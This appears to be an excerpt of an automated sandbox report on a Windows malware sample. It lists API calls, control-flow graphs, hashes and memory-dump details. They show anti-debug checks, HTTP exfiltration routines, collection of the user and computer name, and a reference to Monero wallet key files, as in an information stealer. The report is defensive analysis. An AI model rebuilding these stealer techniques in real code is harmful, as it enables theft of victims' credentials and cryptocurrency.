                          • GetProcAddress.KERNEL32(75900000,006D66C0), ref: 00C09A57
                          • GetProcAddress.KERNEL32(75900000,006E0720), ref: 00C09A70
                          • GetProcAddress.KERNEL32(75900000,006D66E0), ref: 00C09A88
                          • LoadLibraryA.KERNEL32(006E0600,?,00C06A00), ref: 00C09A9A
                          • LoadLibraryA.KERNEL32(006E0738,?,00C06A00), ref: 00C09AAB
                          • LoadLibraryA.KERNEL32(006E0618,?,00C06A00), ref: 00C09ABD
                          • LoadLibraryA.KERNEL32(006E0648,?,00C06A00), ref: 00C09ACF
                          • LoadLibraryA.KERNEL32(006E07C8,?,00C06A00), ref: 00C09AE0
                          • GetProcAddress.KERNEL32(75070000,006E07E0), ref: 00C09B02
                          • GetProcAddress.KERNEL32(75FD0000,006E07F8), ref: 00C09B23
                          • GetProcAddress.KERNEL32(75FD0000,006E8EF8), ref: 00C09B3B
                          • GetProcAddress.KERNEL32(75A50000,006E8FB8), ref: 00C09B5D
                          • GetProcAddress.KERNEL32(74E50000,006D68C0), ref: 00C09B7E
                          • GetProcAddress.KERNEL32(76E80000,006E8800), ref: 00C09B9F
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00C09BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: jm$NtQueryInformationProcess$fm
                          • API String ID: 2238633743-1598263956
                          • Opcode ID: 04084f0072162eb4d9ebb8ecfe5bf933c00f67c515d35cdea0e1da888fc89d66
                          • Instruction ID: 6d4e173ee8d56a83bf0fd6ebe8ec5cf892e555306a50fba031d8e791f01b034c
                          • Opcode Fuzzy Hash: 04084f0072162eb4d9ebb8ecfe5bf933c00f67c515d35cdea0e1da888fc89d66
                          • Instruction Fuzzy Hash: C7A16CB55042089FD348EFAAED8CA663FF9F79C30170C453AA685A3274D63994C9CB12

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 bf45c0-bf4695 RtlAllocateHeap 781 bf46a0-bf46a6 764->781 782 bf474f-bf47a9 VirtualProtect 781->782 783 bf46ac-bf474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BF479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was 
founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: afb28f3f9af297209b177c6dd401ac5f8367e02f1f19017f1b05d8b9a5b18be3
                          • Instruction ID: a96ab823f2d8c6bcbcdbd37063e1242bbc98870e299eb7b6d5e8a16cee3c73aa
                          • Opcode Fuzzy Hash: afb28f3f9af297209b177c6dd401ac5f8367e02f1f19017f1b05d8b9a5b18be3
                          • Instruction Fuzzy Hash: 8A41F4707CA608FBEE2AB7B488C6DDF76A6DFC7708F509160EA00536D0CAB066805576

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 bf4880-bf4942 call c0a7a0 call bf47b0 call c0a740 * 5 InternetOpenA StrCmpCA 816 bf494b-bf494f 801->816 817 bf4944 801->817 818 bf4ecb-bf4ef3 InternetCloseHandle call c0aad0 call bf9ac0 816->818 819 bf4955-bf4acd call c08b60 call c0a920 call c0a8a0 call c0a800 * 2 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a920 call c0a8a0 call c0a800 * 2 InternetConnectA 816->819 817->816 828 bf4ef5-bf4f2d call c0a820 call c0a9b0 call c0a8a0 call c0a800 818->828 829 bf4f32-bf4fa2 call c08990 * 2 call c0a7a0 call c0a800 * 8 818->829 819->818 905 bf4ad3-bf4ad7 819->905 828->829 906 bf4ad9-bf4ae3 905->906 907 bf4ae5 905->907 908 bf4aef-bf4b22 HttpOpenRequestA 906->908 907->908 909 bf4ebe-bf4ec5 InternetCloseHandle 908->909 910 bf4b28-bf4e28 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a740 call c0a920 * 2 call c0a8a0 call c0a800 * 2 call c0aad0 lstrlen call c0aad0 * 2 lstrlen call c0aad0 HttpSendRequestA 908->910 909->818 1021 bf4e32-bf4e5c InternetReadFile 910->1021 1022 bf4e5e-bf4e65 1021->1022 1023 bf4e67-bf4eb9 InternetCloseHandle call c0a800 1021->1023 1022->1023 1024 bf4e69-bf4ea7 call c0a9b0 call c0a8a0 call c0a800 1022->1024 1023->909 1024->1021
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BF4915
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C10DDB,00000000,?,?,00000000,?,",00000000,?,006EE540), ref: 00BF4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BF4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BF4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BF4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00BF4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00BF4EC5
                          • HttpOpenRequestA.WININET(00000000,006EE5B0,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF4B15
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00BF4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------$0n$@n
                          • API String ID: 460715078-3736300606
                          • Opcode ID: 439e4ba1de88278b933e36541394e2ac4627bb98a8eba76f2d076b912decfaf6
                          • Instruction ID: 8a3c7e50044fced6f53473a55161d8a4cf271fa092b080146d7af1a60139bf77
                          • Opcode Fuzzy Hash: 439e4ba1de88278b933e36541394e2ac4627bb98a8eba76f2d076b912decfaf6
                          • Instruction Fuzzy Hash: 2812CB71910218AADB15EB90DD96FEEB778AF15300F5482A9B106720D1EF702F89DF62
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00C0792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: c921b143352a821c07165c7ce9db42585a6bd365c723b688b96e3ba222632d75
                          • Instruction ID: a5b94127c7761555ce68b39bbb4f2e53d06ee052cde8543262a83c75fc9221a7
                          • Opcode Fuzzy Hash: c921b143352a821c07165c7ce9db42585a6bd365c723b688b96e3ba222632d75
                          • Instruction Fuzzy Hash: B50186B1904208EFC704DF99DD49BAABBBCFB04B21F104269F545E32C0C3745944CBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BF11B7), ref: 00C07880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C0789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: a611f822598135dad58b08d7b4e04cacdc5dcdd1f018a4e55029461626f0cbde
                          • Instruction ID: 5b6d94dedd1df9330c754bc1d24c3a356bdcc517ee8f71aba8b605eb638abba2
                          • Opcode Fuzzy Hash: a611f822598135dad58b08d7b4e04cacdc5dcdd1f018a4e55029461626f0cbde
                          • Instruction Fuzzy Hash: 1EF04FB1D44208AFC704DF99DD49FAEFFB8EB04721F10026AFA05A2680C7741548CBA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 40de54e9247eeb268ca78e379aa41790b77b76f546739a91ef02461f2e7839a3
                          • Instruction ID: d4f1becc251e072d91b1d5144a8750caf89519462a96471a1f7fb0265df49e6c
                          • Opcode Fuzzy Hash: 40de54e9247eeb268ca78e379aa41790b77b76f546739a91ef02461f2e7839a3
                          • Instruction Fuzzy Hash: D3D05E7490030CDFCB00DFE1D88D6EDBBB8FB08321F0409A5D90572340EA3155D9CAA6

                          Control-flow Graph

                          • Executed
                          • Not Executed
